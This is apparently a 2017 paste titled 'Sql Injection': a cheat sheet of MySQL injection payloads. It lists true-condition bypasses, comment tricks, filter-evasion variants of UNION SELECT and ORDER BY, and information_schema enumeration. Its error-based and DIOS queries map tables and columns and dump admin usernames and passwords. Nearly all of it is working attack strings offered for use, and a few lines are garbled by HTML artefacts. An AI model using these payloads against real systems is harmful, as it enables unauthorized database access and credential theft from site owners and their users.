
Sql Injection

a guest
Apr 23rd, 2017
  1. [~] Check Error [~]
  2.  
  3. 01. '
  4. 02. "
  5. 03. or 1=1
  6. 04. and 1=1
  7. 05. and false
  8. 06. and true
  9. • [Single quotes]
  10. 01. ' or '1'='1
  11. 02. ' and '1'='1
  12. 03. ' and false
  13. 04. ' and true
  14. • [Double quotes]
  15. 01. " or "1"="1
  16. 02. " and "1"="1
  17. 03. " and false
  18. 04. " and true
  19.  
  20. [~]Bypass True Condition[~]
  21.  
  22. or '1
  23. || '1
  24. null' || 'a'=_binary'a
  25. 1' || 'a'=x'61
  26. 1' && '0'=x'30
  27. 1' %26%26 %270%27%3dx'30
  28. 2' && 0.e1=_binary"0
  29. 1 or 1.e1=0b1010
  30. ' || 1 like 1
  31. '-'
  32. "-"
  33. ' || 2 not like 1
  34. 110 or x'30'=48
  35. '1'!=20
  36. 1 or 20!='1'
  37. 2 and 2>0
  38. 3 || 0<1
  39. 12 || 0b1010<0b1011
  40. 0b11 || 0b1010x'30'
  41. 1 or 0b1
  42. 2121/**/||21
  43. 111' or _binary'1
  44. 1 or 2121
  45. 1' or 12 rlike '1
  46.  
  47.  
  48. [~] COMMENTS [~]
  49.  
  50. 01. -- : MySQL Linux Style
  51. 02. --+ : MySQL Windows Style
  52. 03. # : Hash (URL-encode when used)
  53. 04. --+- : SQL Comment
  54. 05. ;%00 : Null Byte
  55. 07. ` : Backtick
  56. 08. -- -
  57. 09. /*
  58. 10. /**/
  59. 11. %23
  60. 12. //
  61.  
  62.  
  63. [~] order by [~]
  64.  
  65. 01. group by -- +
  66. 02. and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+
  67. 03. Procedure Analyse()--+
  68. 04. and (select * from news)=(select 0)--+
  69. 05. /**/ORDER/**/BY/**/
  70. 06. /*!order*/+/*!by*/
  71. 07. /*!ORDER BY*/
  72. 08. /*!50000ORDER BY*/
  73. 09. /*!50000ORDER*//**//*!50000BY*/
  74. 10. /*!12345ORDER*/+/*!BY*/
  75.  
  76.  
  77. [~] UNION select [~]
  78.  
  79. 01. (uNioN)+(sElECt)….
  80. 02. (uNioN+SeleCT)+…
  81. 03. (UnI)(oN)+(SeL)(ecT)+….
  82. 04. union (select 1,2,3,4…)
  83. 05. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  84. 06. %55nion(%53elect 1,2,3)-- -
  85. 07. +union+distinct+select+
  86. 08. +union+distinctROW+select+
  87. 09. /**//*!12345UNION SELECT*//**/
  88. 10. /**//*!50000UNION SELECT*//**/
  89. 11. /**/UNION/**//*!50000SELECT*//**/
  90. 12. /*!50000UniON SeLeCt*/
  91. 13. union /*!50000%53elect*/
  92. 14. +#uNiOn+#sEleCt
  93. 15. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  94. 16. /*!%55NiOn*/ /*!%53eLEct*/
  95. 17. /*!u%6eion*/ /*!se%6cect*/
  96. 18. +un/**/ion+se/**/lect
  97. 19. uni%0bon+se%0blect
  98. 20. %2f**%2funion%2f**%2fselect
  99. 21. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  100. 22. REVERSE(noinu)+REVERSE(tceles)
  101. 24. /*--*/union/*--*/select/*--*/
  102. 25. union (/*!/**/ SeleCT */ 1,2,3)
  103. 26. /*!union*/+/*!select*/
  104. 27. union+/*!select*/
  105. 28. /**/union/**/select/**/
  106. 29. /**/uNIon/**/sEleCt/**/
  107. 30. +%2F**/+Union/*!select*/
  108. 31. /**//*!union*//**//*!select*//**/
  109. 32. /*!uNIOn*/ /*!SelECt*/
  110. 33. +union+distinct+select+
  111. 34. +union+distinctROW+select+
  112. 35. uNiOn aLl sElEcT
  113. 36. UNIunionON+SELselectECT
  114. /**/union/*!50000select*//**/
  115. 0%a0union%a0select%09
  116. %0Aunion%0Aselect%0A
  117. %55nion/**/%53elect
  118. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  119. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  120. %0A%09UNION%0CSELECT%10NULL%
  121. /*!union*//*--*//*!all*//*--*//*!select*/
  122. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  123. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  124. +UnIoN/*&a=*/SeLeCT/*&a=*/
  125. union+sel%0bect
  126. +uni*on+sel*ect+
  127. +#1q%0Aunion all#qa%0A#%0Aselect
  128. union(select (1),(2),(3),(4),(5))
  129. UNION(SELECT(column)FROM(table))
  130. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  131. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  132. union(select(1),2,3)
  133. union (select 1111,2222,3333)
  134. uNioN (/*!/**/ SeleCT */ 11)
  135. union (select 1111,2222,3333)
  136. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  137. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  138. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  139. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  140. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  141. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  142. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  143. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  144. /union\sselect/g
  145. /union\s+select/i
  146. /*!UnIoN*/SeLeCT
  147. +UnIoN/*&a=*/SeLeCT/*&a=*/
  148. +uni>on+sel>ect+
  149. +(UnIoN)+(SelECT)+
  150. +(UnI)(oN)+(SeL)(EcT)
  151. +’UnI”On’+'SeL”ECT’
  152. +uni on+sel ect+
  153. +/*!UnIoN*/+/*!SeLeCt*/+
  154. /*!u%6eion*/ /*!se%6cect*/
  155. uni%20union%20/*!select*/%20
  156. union%23aa%0Aselect
  157. /**/union/*!50000select*/
  158. /^.*union.*$/ /^.*select.*$/
  159. /*union*/union/*select*/select+
  160. /*uni X on*/union/*sel X ect*/
  161. +un/**/ion+sel/**/ect+
  162. +UnIOn%0d%0aSeleCt%0d%0a
  163. UNION/*&test=1*/SELECT/*&pwn=2*/
  164. un?<ion sel="">+un/**/ion+se/**/lect+
  165. +UNunionION+SEselectLECT+
  166.  
  167. +uni%0bon+se%0blect+
  168. %252f%252a*/union%252f%252a /select%252f%252a*/
  169. /%2A%2A/union/%2A%2A/select/%2A%2A/
  170. %2f**%2funion%2f**%2fselect%2f**%2f
  171. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  172. /*!UnIoN*/SeLecT+
  173.  
  174. [~] information_schema.tables [~]
  175.  
  176. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  177. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  178. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  179. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  180. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  181. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  182.  
  183. [~] concat() [~]
  184.  
  185. CoNcAt()
  186. concat()
  187. CON%08CAT()
  188. CoNcAt()
  189. %0AcOnCat()
  190. /**//*!12345cOnCat*/
  191. /*!50000cOnCat*/(/*!*/)
  192. unhex(hex(concat(table_name)))
  193. unhex(hex(/*!12345concat*/(table_name)))
  194. unhex(hex(/*!50000concat*/(table_name)))
  195.  
  196. [~] group_concat() [~]
  197.  
  198. /*!group_concat*/()
  199. gRoUp_cOnCAt()
  200. group_concat(/*!*/)
  201. group_concat(/*!12345table_name*/)
  202. group_concat(/*!50000table_name*/)
  203. /*!group_concat*/(/*!12345table_name*/)
  204. /*!group_concat*/(/*!50000table_name*/)
  205. /*!12345group_concat*/(/*!12345table_name*/)
  206. /*!50000group_concat*/(/*!50000table_name*/)
  207. /*!GrOuP_ConCaT*/()
  208. /*!12345GroUP_ConCat*/()
  209. /*!50000gRouP_cOnCaT*/()
  210. /*!50000Gr%6fuP_c%6fnCAT*/()
  211. unhex(hex(group_concat(table_name)))
  212. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  213. unhex(hex(/*!12345group_concat*/(table_name)))
  214. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  215. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  216. unhex(hex(/*!50000group_concat*/(table_name)))
  217. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  218. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  219. convert(group_concat(table_name)+using+ascii)
  220. convert(group_concat(/*!table_name*/)+using+ascii)
  221. convert(group_concat(/*!12345table_name*/)+using+ascii)
  222. convert(group_concat(/*!50000table_name*/)+using+ascii)
  223. CONVERT(group_concat(table_name)+USING+latin1)
  224. CONVERT(group_concat(table_name)+USING+latin2)
  225. CONVERT(group_concat(table_name)+USING+latin3)
  226. CONVERT(group_concat(table_name)+USING+latin4)
  227. CONVERT(group_concat(table_name)+USING+latin5)
  228.  
  229. [~] Error based [~]
  230.  
  231. • Check version
  232. = and (select * from (select name_const(version(),1),name_const(version(),1))a)
  233. • Check user
  234. = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  235. • Check database
  236. = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  237. • Check Table
  238. = and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  239. • Check Column
  240. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  241. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  242. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  243.  
  244. • Dump data
  245. = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  246. = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  247.  
  248.  
  249. [~] Using Xpath [~]
  250. 01. and extractvalue(0x0a,concat(0x0a,(OUR QUERY HERE)))--
  251.  
  252. [~]DIOS[~]
  253.  
  254. 01. (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
  255. 02. (select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
  256. 03. (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
  257. 04. make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
  258. 05. (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns) where@:=export_set(5,export_set(5,export_set(5,@,table_schema,0x3c6c693e,2),table_name,0xa3a,2),column_name,0xa3a,2)),@,2))